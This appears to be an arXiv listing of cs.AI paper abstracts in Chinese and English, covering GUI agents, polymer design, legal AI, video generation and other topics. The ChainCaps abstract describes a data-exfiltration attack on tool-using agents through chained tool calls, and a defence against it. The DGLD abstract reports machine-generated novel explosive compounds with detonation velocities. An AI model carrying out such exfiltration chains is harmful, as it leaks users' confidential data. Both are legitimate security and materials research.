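Dividing by `p_obs` makes the expected weighted loss match the loss one would see with complete feedback, which is the usual motivation for IPW. The plain `math.exp` call can overflow for very large scores, so a production version would need a numerically stable softplus.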

2605.26546 2026-05-27 cs.AI 版本更新

MobileExplorer: Accelerating On-Device Inference for Mobile GUI Agents via Online Exploration

MobileExplorer: 通过在线探索加速移动GUI代理的端侧推理

Runxi Huang, Liyu Zhang, Shengzhong Liu, Xiaomin Ouyang

发表机构 * Hong Kong University of Science and Technology(香港科技大学) Shanghai Jiao Tong University(上海交通大学)

AI总结 提出MobileExplorer框架,通过在线探索并行探测UI元素并记录为结构化记忆,结合两级回滚机制,减少推理步骤和延迟,提升移动GUI代理的端侧部署效率。

详情
AI中文摘要

移动图形用户界面(GUI)代理使AI模型能够代表用户自主操作智能手机。然而,现有系统主要关注优化任务准确性,并依赖云端模型进行推理,这引入了隐私问题和网络依赖延迟。因此,移动GUI代理的完全端侧部署仍未被充分探索。我们提出MobileExplorer,一种通过在线探索加速基于视觉的移动GUI代理端侧推理的新框架。关键思想是利用视觉语言模型(VLM)较长的每步推理时间,对UI元素进行轻量级并行探索。在模型推理期间,代理主动探测语义相关的UI元素,并将这些探索轨迹记录为结构化记忆。为确保在真实移动环境中可靠执行,我们设计了两级回滚机制,当快速但简单的回溯策略失败时,能够稳健地恢复初始UI状态。收集的探索轨迹随后被总结为简洁的上下文提示,并注入到提示中,以增强后续推理步骤。我们在多个现成设备上使用AndroidWorld基准测试以及新设计的更复杂任务和动态端侧环境评估了MobileExplorer。MobileExplorer将平均推理步骤数和端到端延迟减少了23%,同时将任务成功率维持或提高了高达5%。真实世界中MobileExplorer性能的视频演示可在https://youtu.be/thK7MJmdlvM获取。

英文摘要

Mobile graphical user interface (GUI) agents enable AI models to autonomously operate smartphones on behalf of users. However, most existing systems focus primarily on optimizing task accuracy and rely on cloud-hosted models for inference, which introduces privacy concerns and network-dependent latency. As a result, fully on-device deployment of mobile GUI agents remains underexplored. We propose MobileExplorer, a new framework that accelerates on-device inference for vision-based mobile GUI agents via online exploration. The key idea is to exploit the long per-step reasoning time of vision-language models (VLMs) by performing lightweight, parallel exploration of UI elements. During model inference, the agent proactively probes semantically relevant UI elements and records these exploration traces as structured memory. To ensure reliable execution in live mobile environments, we design a two-level rollback mechanism that robustly restores the initial UI state when a fast but naive backtracking strategy fails. The collected exploration traces are then summarized into concise contextual hints and injected into the prompt to enhance the subsequent reasoning step. We evaluate MobileExplorer on multiple off-the-shelf devices using the AndroidWorld benchmark, as well as newly designed, more complex tasks and dynamic on-device environments. MobileExplorer reduces the average number of reasoning steps and end-to-end latency by 23%, while maintaining or improving task success rates by up to 5%. A video demonstration of MobileExplorer performance in the real world is available at https://youtu.be/thK7MJmdlvM.

2605.26543 2026-05-27 cs.AI cs.LG 版本更新

PolyFusionAgent: A Multimodal Foundation Model and Autonomous AI Assistant for Polymer Property Prediction and Inverse Design

PolyFusionAgent: 用于聚合物性能预测和逆向设计的多模态基础模型与自主AI助手

Manpreet Kaur, Xingying Zhang, Qian Liu

发表机构 * Department of Applied Computer Science, The University of Winnipeg(应用计算机科学系,温尼伯大学) Department of Mechanical Engineering, University of Manitoba(机械工程系,曼尼托巴大学)

AI总结 提出PolyFusionAgent框架,结合多模态聚合物基础模型PolyFusion和工具增强的设计代理PolyAgent,通过对齐序列、拓扑、3D几何和指纹等多模态视图学习共享潜在空间,实现热物理性能预测和化学有效、结构新颖的聚合物逆向设计,并利用文献证据检索闭环设计流程。

Comments 23 pages, 5 figures, 2 tables; Supplementary material included

详情
AI中文摘要

聚合物的发现对于从能量存储到生物医学等领域至关重要,但受到天文数字般的化学设计空间以及结构、性能和先验知识的碎片化表示的阻碍。这种碎片化使得许多AI模型与物理和实验现实脱节,限制了它们支持直接可操作设计决策的能力。在这里,我们介绍PolyFusionAgent,一个交互式框架,将多模态聚合物基础模型(PolyFusion)与工具增强、基于文献的设计代理(PolyAgent)相结合。PolyFusion对齐互补的聚合物视图,包括序列、拓扑、3D几何和指纹,跨越数百万种聚合物,学习一个跨化学和数据体系可迁移的共享潜在空间,改进了热物理性能预测,并实现了超出参考设计空间的化学有效、结构新颖聚合物的性能条件生成。PolyAgent通过将预测和逆向设计与从聚合物文献中检索证据联系起来,在一个工作流中提出、评估和情境化假设,从而闭合设计循环。PolyFusionAgent共同实现了交互式、证据关联的聚合物发现,结合了大规模表示学习、多模态化学知识和可验证的科学推理。

英文摘要

Polymer discovery is central to fields ranging from energy storage to biomedicine, but it is hindered by an astronomically large chemical design space and fragmented representations of structure, properties, and prior knowledge. This fragmentation leaves many AI models disconnected from physical and experimental reality, restricting their ability to support directly actionable design decisions. Here we introduce PolyFusionAgent, an interactive framework coupling a multimodal polymer foundation model (PolyFusion) with a tool-augmented, literature-grounded design agent (PolyAgent). PolyFusion aligns complementary polymer views including sequence, topology, 3D geometry, and fingerprints across millions of polymers to learn a shared latent space transferable across chemistries and data regimes, improving thermophysical property prediction and enabling property-conditioned generation of chemically valid, structurally novel polymers beyond the reference design space. PolyAgent closes the design loop by linking prediction and inverse design with evidence retrieval from the polymer literature, proposing, evaluating, and contextualizing hypotheses with explicit precedent in one workflow. Together, PolyFusionAgent enables interactive, evidence-linked polymer discovery combining large-scale representation learning, multimodal chemical knowledge, and verifiable scientific reasoning.

2605.26542 2026-05-27 cs.CR cs.AI 版本更新

ChainCaps: Composition-Safe Tool-Using Agents via Monotonic Capability Attenuation

ChainCaps: 通过单调能力衰减实现组合安全的工具使用智能体

Xiaochong Jiang, Shiqi Yang, Ziwei Li, Lifei Liu, Haoran Yu, Yichen Liu

发表机构 * Independent Researcher, Seattle, WA, USA(华盛顿州西雅图独立研究员) Independent Researcher, New York City, NY, USA(纽约州纽约市独立研究员) King Abdullah University of Science and Technology(阿卜杜拉国王科技大学)

AI总结 针对工具组合中的权限洗钱漏洞,提出ChainCaps机制,通过运行时能力预算交集传播规则,在不修改智能体或工具服务器的情况下,将攻击成功率从25-68%降至0-4.8%,同时保持96-100%的良性任务完成率。

Comments Published at the Second Workshop on Agents in the Wild: Safety, Security, and Beyond (AIWILD) at ICML 2026

详情
AI中文摘要

工具使用智能体越来越多地在开放式部署环境中运行,它们会在运行时组合文件系统、Web API、代码解释器和企业服务。这造成了工具组合中的安全缺口:智能体可以通过每个工具的权限检查,但仍然产生不安全的端到端效果,例如读取机密文档、总结并将其发送到外部端点。我们将这种失败模式称为权限洗钱。ChainCaps通过一个运行时规则解决这一问题:每个值携带一个特定于接收器的能力预算,工具组合通过交集传播预算。一个值在通过工具链时可能保留或失去权限,但无法通过组合获得新权限。我们将ChainCaps实现为一个透明的MCP代理,无需对智能体或工具服务器进行任何更改。在来自三个提供商的五个前沿模型的82个任务上,ChainCaps将攻击成功率从25-68%降低到0-4.8%,同时保留了96-100%的良性完成率。在重放实验中,它也优于标量IFC和每函数隔离基线。清单质量是主要的部署瓶颈:专家清单达到100%的攻击阻止,而朴素清单则降至27.3%。我们的主张仅限于在可信清单和代理可见数据移动下的显式流组合安全性,这是当前部署的工具使用智能体中的一个实际缺口。

英文摘要

Tool-using agents increasingly operate in open-ended deployment environments, where they compose file systems, web APIs, code interpreters, and enterprise services at runtime. This creates a safety gap in tool composition: an agent can satisfy every per-tool permission check and still produce an unsafe end-to-end effect, such as reading a confidential document, summarizing it, and sending the summary to an external endpoint. We call this failure mode permission laundering. ChainCaps addresses it with a runtime rule: every value carries a sink-specific capability budget, and tool composition propagates budgets by intersection. A value can preserve or lose authority as it moves through a tool chain, but it cannot gain new authority through composition. We implement ChainCaps as a transparent MCP proxy that requires no changes to the agent or tool servers. On 82 tasks across five frontier models from three providers, ChainCaps reduces attack success rate from 25-68% to 0-4.8% while preserving 96-100% benign completion. In replay experiments, it also outperforms scalar-IFC and per-function-isolation baselines. Manifest quality is the dominant deployment bottleneck: expert manifests reach 100% attack blocking, while naive manifests fall to 27.3%. Our claims are limited to explicit-flow composition safety under trusted manifests and proxy-visible data movement, a practical gap in deployed tool-using agents today.
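The intersection rule described in this abstract can be sketched in a few lines. This is an illustrative toy, not the ChainCaps proxy itself: the `Tagged` class, the `compose` and `send` helpers, and the sink names are all hypothetical.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class Tagged:
    """A value together with the set of sinks it may still flow to."""
    value: str
    budget: frozenset

def compose(tool, *inputs, tool_budget):
    """Run a tool; the output budget is the intersection of every budget involved."""
    budget = frozenset(tool_budget)
    for item in inputs:
        budget &= item.budget             # authority can shrink but never grow
    return Tagged(tool(*(item.value for item in inputs)), budget)

def send(item, sink):
    """Refuse any flow to a sink that is not in the value's budget."""
    if sink not in item.budget:
        raise PermissionError(f"flow to {sink!r} is outside the budget")
    return f"sent to {sink}"

secret = Tagged("Q3 figures", frozenset({"internal_wiki"}))
summary = compose(lambda text: text.upper(), secret,
                  tool_budget={"internal_wiki", "external_email"})
```

Even though the summarizing tool on its own is permitted to reach `external_email`, the summary inherits only `internal_wiki` from its confidential input, so the read, summarize, send chain from the abstract is blocked at the final step.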

2605.26540 2026-05-27 physics.chem-ph cs.AI 版本更新

DGLD: Domain-Gated Latent Diffusion for the Discovery of Novel Energetic Materials

DGLD: 用于发现新型含能材料的域门控潜在扩散

Yehudit Aperstein, Alexander Apartsin

发表机构 * Department of Intelligent Systems, Afeka Tel-Aviv College of Engineering(智能系统系,阿费卡特拉维夫工程学院) School of Computer Science, Faculty of Sciences, HIT - Holon Institute of Technology(计算机科学学院,科学学院,霍隆理工学院)

AI总结 提出域门控潜在扩散模型(DGLD),通过标签质量门控、多任务评分引导和四阶段化学验证漏斗,从稀疏标记数据中生成12个经DFT验证的新型含能材料候选物,其中领先化合物L1和E1在爆速和结构新颖性上表现优异。

Comments 49 pages, 25 figures

详情
AI中文摘要

含能材料的性能提升直接转化为推进剂质量减少、弹头小型化以及更高效的民用气体发生器,然而十五年来没有新的HMX类化合物被公开。设计这样一个化合物是一个稀疏标签问题:在约6.6万个标记的CHNO分子中,只有约3000个带有实验或DFT质量测量值,而在完整混合物上训练的朴素生成模型要么记忆高性能尾部,要么在无校准的情况下外推。我们引入了域门控潜在扩散(DGLD):训练时的标签质量门控、采样时的多任务评分模型引导,以及一个以第一性原理DFT审计结束的四阶段化学验证漏斗。结果是12个经DFT确认的新候选物。主打化合物3,4,5-三硝基-1,2-异噁唑(L1)达到ρ_cal=2.09 g/cm³和D_K-J,cal=8.25 km/s,且与所有65980个训练分子结构不同(最近邻Tanimoto系数0.27)。另一个主打候选物E1(4-硝基-1,2,3,5-氧杂三唑)在标定爆速(D_K-J,cal=9.00 km/s)上超过L1,且其化学型家族与L1的不相交。DGLD是唯一在DFT级别上落入生产性象限(同时新颖且达标)的方法。SMILES-LSTM精确记忆了其18.3%的输出;SELFIES-GA的最佳新颖候选物在DFT审计下损失了3.5 km/s;REINVENT 4生成了新颖的高氮杂环,但峰值仅为D=9.02 km/s。代码、检查点和918个挖掘的硬负样本已在Zenodo上发布(DOI 10.5281/zenodo.19821953);下一个进入HMX类能带的化合物可以以几个GPU天的成本被发现、验证并推荐合成。

英文摘要

Energetic-materials performance gains translate directly into reduced propellant mass, smaller warheads, and more efficient civilian gas-generators, yet no new HMX-class compound has been disclosed in fifteen years. Designing one is a sparse-label problem: of ~66 k labelled CHNO molecules only ~3 k carry experimental or DFT-quality measurements, and naive generative models trained on the full mixture either memorise the high-performance tail or extrapolate without calibration. We introduce Domain-Gated Latent Diffusion (DGLD): a label-quality gate at training time, multi-task score-model guidance at sample time, and a four-stage chemistry-validation funnel ending in first-principles DFT audit. The result is 12 DFT-confirmed novel leads. The headline compound, 3,4,5-trinitro-1,2-isoxazole (L1), reaches ρ_cal = 2.09 g/cm³ and D_K-J,cal = 8.25 km/s and is structurally dissimilar from all 65 980 training molecules (nearest-neighbour Tanimoto 0.27). A co-headline lead, E1 (4-nitro-1,2,3,5-oxatriazole), exceeds L1 on calibrated detonation velocity (D_K-J,cal = 9.00 km/s) from a chemotype family disjoint from L1's. DGLD is the only method to land in the productive quadrant (simultaneously novel and on-target) at DFT level. SMILES-LSTM memorises 18.3% of its outputs exactly; SELFIES-GA's best novel candidate loses 3.5 km/s under DFT audit; REINVENT 4 generates novel high-N heterocycles but peaks at D=9.02 km/s. Code, checkpoints, and 918 mined hard negatives are released on Zenodo (DOI 10.5281/zenodo.19821953); the next compound to enter the HMX-class band can be discovered, validated, and recommended for synthesis at the cost of a few GPU-days.
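The "nearest-neighbour Tanimoto" figure quoted above is a standard novelty measure. A minimal sketch of how such a number is computed follows, assuming fingerprints are represented as Python sets of "on" bit indices; the toy fingerprints and the helper names are hypothetical, and a real pipeline would obtain fingerprints from a cheminformatics toolkit.

```python
def tanimoto(a, b):
    """Tanimoto (Jaccard) similarity between two fingerprint bit sets."""
    union = len(a | b)
    return len(a & b) / union if union else 0.0

def nearest_neighbour_similarity(candidate, training_set):
    """Highest similarity between a candidate and any training molecule."""
    return max(tanimoto(candidate, fp) for fp in training_set)

# Toy fingerprints: each set lists the bit positions that are switched on.
training = [{1, 2, 3, 4}, {2, 5, 8}, {7, 9}]
candidate = {2, 3, 10}
score = nearest_neighbour_similarity(candidate, training)
```

A low nearest-neighbour score means that no training molecule shares much substructure with the candidate, which is the sense in which a value such as 0.27 indicates structural novelty.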

2605.26535 2026-05-27 cs.LG cs.AI cs.CV cs.NA math.NA 版本更新

Recursive Flow Matching

递归流匹配

Jiahe Huang, Sihan Xu, Sharvaree Vadgama, Rose Yu

发表机构 * University of California, San Diego(加州大学圣地亚哥分校) University of Michigan(密歇根大学)

AI总结 提出递归流匹配(RecFM)框架,通过自一致性约束对齐不同离散化尺度的轨迹,实现高保真单步或少步(2-4步)动态生成,在科学基准上相比领先扩散模拟器加速20倍且提升预测精度。

Comments Project page: https://jhhuangchloe.github.io/RecFM/

详情
AI中文摘要

生成模型已成为解决物理系统和建模复杂时空动态的强大范式。然而,在不产生高计算成本的情况下实现高物理精度仍然是一个基本挑战,因为现有方法面临关键的速度-保真度权衡。在这项工作中,我们引入了递归流匹配(RecFM),一个用于预测复杂时空动态的生成框架。RecFM强制执行自一致性以对齐跨离散化尺度的轨迹,减少离散化误差并改善基于物理任务的各种指标。据我们所知,这是第一种在科学系统中实现高保真单步和少步(2-4步)动态生成的方法,其性能可与最先进的多步求解器相媲美。在具有挑战性的科学基准测试中,RecFM相比领先的扩散模拟器实现了高达20倍的加速,同时提高了预测精度。此外,与普通流匹配相比,RecFM将均方误差降低了超过15%,为实时科学模拟提供了一种可扩展且高效的解决方案。

英文摘要

Generative models have emerged as a powerful paradigm for solving physics systems and modeling complex spatiotemporal dynamics. However, achieving high physical accuracy without incurring high computational cost remains a fundamental challenge, as existing approaches face a critical speed-fidelity trade-off. In this work, we introduce Recursive Flow Matching (RecFM), a generative framework for forecasting complex spatiotemporal dynamics. RecFM enforces self-consistency to align trajectories across discretization scales, reducing discretization errors and improving performance across metrics for physics-based tasks. To our knowledge, this is the first method to achieve high-fidelity one- and few-step (2-4 step) dynamic generation for scientific systems with performance comparable to state-of-the-art multi-step solvers. Across challenging scientific benchmarks, RecFM achieves up to a 20$\times$ speedup over leading diffusion-based emulators while improving predictive accuracy. Furthermore, RecFM reduces mean squared error by over 15% compared to vanilla flow matching, offering a scalable and efficient solution for real-time scientific emulation.

2605.26533 2026-05-27 cs.CV cs.AI cs.CL cs.LG 版本更新

A Hybrid Vision-Language Architecture for Automated Defect Reasoning and Report Generation in Industrial Inspection

一种用于工业检测中自动缺陷推理与报告生成的混合视觉-语言架构

Malikussaid, Imad Gohar

发表机构 * School of Computing, Telkom University(Telkom大学计算机学院) Faculty of Engineering and Technology, School of Computing and Artificial Intelligence(工程与技术学院,计算与人工智能学院)

AI总结 本文提出一种解耦的边缘可部署管道,结合YOLO26-x-obb检测器、确定性编码模块和QLoRA微调的Qwen-2.5-1.5B模型,实现风电叶片缺陷定位与结构化报告生成,在BLEU-4、幻觉率和专家评分上显著优于零样本VLM基线。

Comments 23 pages, 6 figures, 9 equations, and 6 tables

详情
AI中文摘要

自动化工业检测需要精确的缺陷定位和结构化的维护报告生成;在当前的实践中,这些任务被分开处理,语言解释留给人类专家。本文描述了一种解耦的、边缘可部署的风电叶片检测管道,由三个组件组成,每个组件处理一个不同的子任务。“眼睛”是一个YOLO26-x-obb定向边界框检测器,在数据集原生分辨率下定位缺陷。“桥梁”是一个确定性的、无参数的编码模块,将每个检测到的边界框映射到嵌入结构化提示中的网格参考空间令牌。“大脑”是一个4比特量化的Qwen-2.5-1.5B模型,通过量化低秩适应(QLoRA)在947个合成生成的维护报告上进行适配,从该提示生成结构化的JSON报告。检索增强微调(RAFT)进一步将每个建议基于索引的维护程序。五项消融实验,通过BLEU-4、ROUGE-L、幻觉率(HR)和LLM-as-a-Judge评分标准,将该管道与单一视觉-语言模型(VLM)基线以及移除一个组件的部分配置进行比较。完整系统实现了BLEU-4 0.41、HR=4%和专家评分8.6/10,而零样本VLM基线分别为0.07、65%和3.3/10。在相同的检测证据下,QLoRA适配的1.5B模型在单个T4级GPU上以每秒47个令牌的速度生成比671B参数通用API模型更高质量的报告。结果表明,具有小型领域特定训练语料库的专用解耦架构在此结构化生成任务上优于通用端到端模型。

英文摘要

Automated industrial inspection requires both precise defect localization and structured maintenance report generation; in current practice these tasks are handled separately, with linguistic interpretation left to human experts. This paper describes a decoupled, edge-deployable pipeline for wind turbine blade inspection built from three components that each handle a distinct sub-task. The Eyes, a YOLO26-x-obb oriented bounding-box detector, localizes defects at dataset-native resolution. The Bridge, a deterministic, parameter-free encoding module, maps each detected bounding box to grid-referenced spatial tokens embedded in a structured prompt. The Brain, a 4-bit quantized Qwen-2.5-1.5B model adapted with Quantized Low-Rank Adaptation (QLoRA) on 947 synthetically generated maintenance reports, generates a structured JSON report from that prompt. Retrieval-Augmented Fine-Tuning (RAFT) further grounds each recommendation in indexed maintenance procedures. Five ablation experiments, scored by BLEU-4, ROUGE-L, Hallucination Rate (HR), and an LLM-as-a-Judge rubric, compare the pipeline against a monolithic vision-language model (VLM) baseline and against partial configurations in which one component is removed. The complete system achieves BLEU-4 0.41, HR=4%, and Expert Score = 8.6/10 compared with 0.07, 65%, and 3.3/10 for the zero-shot VLM baseline. The QLoRA-adapted 1.5B model generates higher-quality reports than a 671B-parameter generalist API model given identical detection evidence, at 47 tokens per second on a single T4-class GPU. The results show that a purpose-built decoupled architecture with a small domain-specific training corpus outperforms a generalist end-to-end model on this structured generation task.
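A deterministic, parameter-free mapping from a detected box to a grid-referenced token could look roughly like the sketch below. The abstract does not specify the grid size, token format, or prompt layout, so the 8 x 8 grid, the letter-plus-number cell names, the prompt wording, and the use of the box centre alone (ignoring orientation) are all assumptions made for illustration.

```python
def box_to_grid_token(cx, cy, img_w, img_h, rows=8, cols=8):
    """Map a box centre in pixels to a cell name such as 'C5' (row letter, column number)."""
    col = min(int(cx / img_w * cols), cols - 1)   # clamp points on the right edge
    row = min(int(cy / img_h * rows), rows - 1)   # clamp points on the bottom edge
    return f"{chr(ord('A') + row)}{col + 1}"

def build_prompt(detections, img_w, img_h):
    """Render detections as one line per defect for a downstream language model."""
    lines = [
        f"- {label} at cell {box_to_grid_token(cx, cy, img_w, img_h)}"
        for label, cx, cy in detections
    ]
    return "Detected defects:\n" + "\n".join(lines)

prompt = build_prompt([("crack", 330.0, 200.0), ("erosion", 10.0, 630.0)], 640, 640)
```

Because the mapping involves no learned parameters, the same detection always yields the same token, which keeps the text side of the pipeline reproducible.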

2605.26530 2026-05-27 cs.AI 版本更新

Which Changes Matter? Towards Trustworthy Legal AI via Relevance-Sensitive Evaluation and Solver-Grounded Reasoning

哪些变化重要?通过相关性敏感评估和求解器基础推理实现可信赖的法律AI

Chen Linze, Cai Yufan, Hou Zhe, Dong Jin Song

发表机构 * National University of Singapore(新加坡国立大学) Griffith University(格里菲斯大学)

AI总结 提出法律相关性敏感评估问题,引入统一评估套件,并设计基于形式推理的对抗多智能体框架LexGuard,以提高法律AI对法律相关变化的校准敏感性。

详情
AI中文摘要

法律推理需要区分重要的变化和不重要的变化。法律AI应在法律无关的扰动下保持稳定,但当扰动改变法律实质要点时应发生变化。我们将这一要求形式化为法律相关性敏感评估问题:LLM应仅对法律相关的变化敏感。我们引入了一个统一的评估套件,涵盖司法公平性、鲁棒性和法规混淆场景中的应变化和不应变化评估。我们的评估表明,现有的法律LLM系统性地对法律无关的变化敏感,并且常常无法区分相关的法律要素和法规规则。为了缓解这些失败,我们提出了LexGuard,一个基于形式推理的对抗多智能体框架。LexGuard将法规形式化为可执行约束,使用对抗智能体提取竞争的事实-法规论点,并调用SMT求解器验证法律满足性和逻辑一致性。实验表明,LexGuard通过减少对操纵性框架的脆弱性、改善相似法规之间的区分、限制法律无关属性的影响以及增加良性重述下的一致性,提高了法律推理的可靠性。我们表明,法律可信赖性不仅需要准确性,还需要对法律实质性变化的校准敏感性。

英文摘要

Legal reasoning requires distinguishing changes that matter from those that do not. Legal AI should remain stable under legally irrelevant perturbations, but should change when perturbations alter legally material points. We formulate this requirement as a legal-relevance-sensitive evaluation problem: LLMs should only be sensitive to the legally relevant change. We introduce a unified evaluation suite covering should-change and should-not-change evaluation across judicial fairness, robustness, and statute-confusion scenarios. Our evaluation shows that existing legal LLMs are systematically sensitive to legally irrelevant variations and often fail to distinguish related legal elements and statutory rules. To mitigate these failures, we present LexGuard, an adversarial multi-agent framework grounded in formal reasoning. LexGuard formalizes statutes into executable constraints, uses adversarial agents to extract competing fact-statute arguments, and invokes SMT solvers to verify legal satisfaction and logical consistency. Experiments show that LexGuard improves legal reasoning reliability by reducing vulnerability to manipulative framing, improving disambiguation among similar statutes, limiting the influence of legally irrelevant attributes, and increasing consistency under benign reformulations. We show that legal trustworthiness requires not only accuracy, but calibrated sensitivity to legally material changes.

2605.26525 2026-05-27 cs.CV cs.AI 版本更新

ReCA: Multi-Shot Long Video Extrapolation via Recursive Context Allocation

ReCA: 通过递归上下文分配实现多镜头长视频外推

Akide Liu, Jinbo Xing, Chaojie Mao, Ye Li, Zeyu Zhang, Yefei He, Weijie Wang, Zihan Wang, Yu Liu, Gholamreza Haffari, Bohan Zhuang

发表机构 * Monash University(蒙纳士大学) Tongyi Lab, Alibaba Group(通义实验室,阿里巴巴集团) Zhejiang University(浙江大学) University of Queensland(昆士兰大学)

AI总结 针对多镜头视频外推任务中上下文分配瓶颈,提出递归上下文分配框架,通过层次化分解和结构化状态传播提升长视频生成的一致性和质量。

Comments Project Page: https://reca.vmv.re , Code: https://github.com/ali-vilab/ReCA

详情
AI中文摘要

分钟级电影式视频生成是生成式视频模型的核心挑战。现有范式仅解决该挑战的片段:单镜头外推保留锚点但缺乏电影结构,而多镜头叙事施加结构却可自由创造视觉状态而非延续观察到的状态。我们定义多镜头视频外推(MSVE)任务,该任务将观察到的帧或片段扩展为一系列具有电影结构的镜头,同时保留锚点状态并推进叙事意图。该设置受限于短视频模型的每次调用生成预算。我们识别出三个耦合瓶颈:(1)全局规划器从完整剧本中过度指定不支持的细节;(2)镜头级提示在携带完整故事时稀释任务相关状态;(3)时间链将生成帧转变为有损记忆,其中身份、场景、对象和动作状态衰减。MSVE揭示长视频失败不仅是上下文长度的限制,更是上下文分配失败。我们提出递归上下文分配(ReCA),一种推理时框架,在规划和生成之间分层分配上下文。ReCA递归地将MSVE分解为上下文有界子问题,在叶节点调用冻结生成器,并跨时间传播结构化状态更新。为评估该设置,我们进一步提出MSVE-Bench和NB-Q,一种源接地协议,带有专为3至5分钟长视频生成设计的提示,该场景未被现有短视频基准覆盖。与先前方法相比,ReCA在最强竞争控制器上将平均归一化分数提高8%至16%,并将多镜头一致性指标提高28%至43%。查看项目页面:https://reca.vmv.re。

英文摘要

Minute-scale cinematic video generation is a central challenge for generative video models. Existing paradigms address only fragments of this challenge: single-shot extrapolation preserves an anchor but lacks cinematic structure, while multi-shot storytelling imposes structure yet remains free to invent its visual states rather than continue an observed one. We define Multi-Shot Video Extrapolation (MSVE), a task that extends an observed frame or clip into a sequence of cinematically structured shots while preserving anchor state and advancing narrative intent. This setting operates under the finite per-call generation budget of short-video models. We identify three coupled bottlenecks: (1) global planners over-specify unsupported details from full screenplays; (2) shot-level prompts dilute task-relevant state when carrying the complete story; and (3) temporal chaining turns generated frames into a lossy memory in which identity, scene, object, and action state decay. MSVE reveals that long-video failure is not merely a limitation of context length, but a failure of context allocation. We propose Recursive Context Allocation (ReCA), an inference-time framework that allocates context hierarchically across planning and generation. ReCA recursively decomposes MSVE into context-bounded subproblems, invokes frozen generators at leaf nodes, and propagates structured state updates across time. To evaluate this setting, we further propose MSVE-Bench and NB-Q, a source-grounded protocol with prompts purpose-built for 3 to 5 minute long-video generation, a regime not addressed by existing short-clip benchmarks. Compared to previous methods, ReCA improves average normalized score by 8 to 16 percent over the strongest competing controller and improves multi-shot consistency metrics by 28 to 43 percent. View the project page at https://reca.vmv.re.

2605.26524 2026-05-27 cs.CV cs.AI 版本更新

CmIVTP: Cross-modal Interaction-based Vessel Trajectory Prediction for Maritime Intelligence

CmIVTP:面向海事智能的基于跨模态交互的船舶轨迹预测

Yuxu Lu, Dong Yang, Xiaoyu Li, Mengwei Bao, Congcong Zhao

发表机构 * Department of Logistics and Maritime Studies, the Hong Kong Polytechnic University(物流及海运研究系,香港理工大学) Research Centre for ESG Advancement (RCESGA), the Hong Kong Polytechnic University(ESG进步研究中心(RCESGA),香港理工大学) School of Navigation, Wuhan University of Technology(航海学院,武汉理工大学)

AI总结 针对单一数据源局限导致船舶轨迹预测不准的问题,提出跨模态交互框架CmIVTP,融合AIS和CCTV数据,利用目标感知场景编码器和跨模态交互Transformer实现高精度预测。

详情
AI中文摘要

海事智能交通系统(MITS)对于确保繁忙水域的航行安全和效率至关重要。然而,由于单源数据的局限性,准确的船舶轨迹预测仍然具有挑战性。自动识别系统(AIS)数据对于小型船舶通常稀疏或不可用,而仅靠闭路电视(CCTV)数据无法完全捕捉动态船舶行为。为缓解这些挑战,我们提出了一种基于跨模态交互的船舶轨迹预测(称为CmIVTP)框架,以建模船舶动力学与环境约束之间的复杂交互。具体地,我们引入了一个目标感知场景编码器来提取场景语义特征,有效捕捉船舶-环境交互并提高轨迹预测精度。此外,我们提出了一个跨模态交互变换器,它集成了AIS衍生的运动特征、基于CCTV的环境特征和场景表示。它利用跨模态注意力机制同时捕捉模态内语义和模态间交互,确保动态一致且环境可行的预测。此外,我们通过将历史AIS轨迹聚类为代表性运动模式构建了船舶群体轨迹库,为候选轨迹生成提供了一种高效且可扩展的方法。另外,我们引入了海事多模态数据集增强版(名为Maritime-MmD$^+$),这是一个同步AIS数据和CCTV视频数据的大规模数据集,为多模态轨迹预测研究提供了有力支持。大量实验表明,CmIVTP在多模态驱动的船舶轨迹预测基准上取得了更好的性能。本工作的代码资源可在https://github.com/LouisYxLu/CmIVTP获取。

英文摘要

Maritime intelligent transportation systems (MITS) are essential for ensuring navigation safety and efficiency in busy waterways. However, accurate vessel trajectory prediction remains challenging due to the limitations of single-source data. Automatic identification system (AIS) data is often sparse or unavailable for small vessels, while closed-circuit television (CCTV) data alone cannot fully capture dynamic vessel behavior. To mitigate these challenges, we propose a cross-modal interaction-based vessel trajectory prediction (named CmIVTP) framework to model the intricate interactions between vessel dynamics and environmental constraints. Specifically, we introduce a target-aware scene encoder to extract scene semantic features, effectively capturing vessel-environment interactions and enhancing trajectory prediction accuracy. In addition, we propose a cross-modal interaction transformer, which integrates AIS-derived motion features, CCTV-based environmental features, and scene representations. It leverages cross-modal attention mechanisms to simultaneously capture intra-modal semantics and inter-modal interactions, ensuring dynamically consistent and environmentally feasible predictions. Furthermore, we construct a vessel group trajectory bank by clustering historical AIS trajectories into representative motion patterns, providing an efficient and scalable approach for candidate trajectory generation. Additionally, we introduce the maritime multimodal dataset plus (named Maritime-MmD$^+$), a large-scale dataset that synchronizes AIS data and CCTV video data, providing robust support for multimodal trajectory prediction research. Extensive experiments demonstrate that CmIVTP achieves better performance on multimodal-driven vessel trajectory prediction benchmarks. The code resources for this work are available at https://github.com/LouisYxLu/CmIVTP.

2605.26523 2026-05-27 cs.DC cs.AI cs.LG 版本更新

StreamSplit: Continuous Audio Representation Learning via Uncertainty-Guided Adaptive Splitting

StreamSplit: 通过不确定性引导的自适应分割实现连续音频表示学习

Minh K. Quan, Pubudu N. Pathirana

发表机构 * School of Engineering, Deakin University(德肯大学工程学院)

AI总结 提出StreamSplit框架,通过分布式的混合损失和强化学习策略实现边缘设备上的流式对比学习,在降低延迟、带宽和能耗的同时保持高精度。

Comments Accepted at ACM MobiSys 2026

详情
AI中文摘要

大批量对比学习(CL)是现代表示学习的基础,但与边缘设备波动的资源约束根本不相容。这种冲突造成了一个困境:设备上的小批量会降低模型保真度,而将计算卸载到云端则会导致不可接受的延迟和带宽成本。现有解决方案通常采用静态模型压缩,无法适应边缘环境的运行时波动。为弥合这一差距,我们提出了StreamSplit,一种新颖的框架,使得流式对比学习在异构ARM客户端平台上变得实用。StreamSplit解决了环境音频的连续性与CLAP和COLA等模型的离散批量需求之间的冲突。我们引入:(1)一种基于分布的流式框架,将表示质量与本地批量大小解耦,使用易于处理的混合损失在稀疏更新的情况下保持保真度;(2)一种不确定性引导的自适应分割器,使用轻量级强化学习(RL)策略动态划分计算。独特的是,该策略将实时资源监控与嵌入歧义性相结合,以动态优化准确率-延迟权衡。我们在从资源受限的Raspberry Pi 4到高性能Apple M2的多种硬件上评估了StreamSplit。结果表明,与以服务器为中心的基线相比,StreamSplit将每样本延迟降低了高达4.7倍,带宽减少了77.1%,能耗减少了52.3%。关键的是,它保持了与服务器中心模型相差2.2%以内的准确率,证明了自适应分布式学习是现代边缘生态系统的一条可行路径。

英文摘要

